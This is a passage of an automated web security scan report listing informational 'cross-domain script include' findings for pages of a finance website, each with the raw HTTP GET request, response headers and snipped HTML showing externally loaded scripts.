Content-Length: 71707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.157. http://money.redacted//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   //

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET //?4ae1b HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/37
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:43 GMT
ntCoent-Length: 71711
Content-Length: 71711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.158. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:12 GMT
Content-Length: 136393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.159. http://money.redacted/budgeting-savings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /budgeting-savings

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /budgeting-savings HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:19 GMT
Content-Length: 49515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.160. http://money.redacted/business-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business-news HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:34 GMT
Content-Length: 74106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.161. http://money.redacted/business-news/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business-news/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:51 GMT
Content-Length: 38206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://www.businessweek.com/bwdaily/headlinefeed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.162. http://money.redacted/business-news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/news.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business-news/news.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:37 GMT
Content-Length: 51552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.163. http://money.redacted/common/commentary.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /common/commentary.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/commentary.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:43 GMT
Content-Length: 67517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.164. http://money.redacted/common/finding-your-way-on-msn-money.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /common/finding-your-way-on-msn-money.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/finding-your-way-on-msn-money.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:41 GMT
Content-Length: 44834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.165. http://money.redacted/common/sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /common/sitemap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/sitemap.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:45 GMT
Content-Length: 30053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.166. http://money.redacted/common/welcome-to-the-new-msn-money.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /common/welcome-to-the-new-msn-money.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/welcome-to-the-new-msn-money.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:36 GMT
Content-Length: 42711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.167. http://money.redacted/credit-and-debt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-and-debt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /credit-and-debt HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:20 GMT
Content-Length: 53105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.168. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.169. http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /currency/2011-the-year-of-wild-speculation-fleckenstein.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:39 GMT
Content-Length: 99025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.170. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 70397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.171. http://money.redacted/exchange-traded-fund

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /exchange-traded-fund

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /exchange-traded-fund HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:11 GMT
Content-Length: 69474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.172. http://money.redacted/exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:29 GMT
Content-Length: 70441

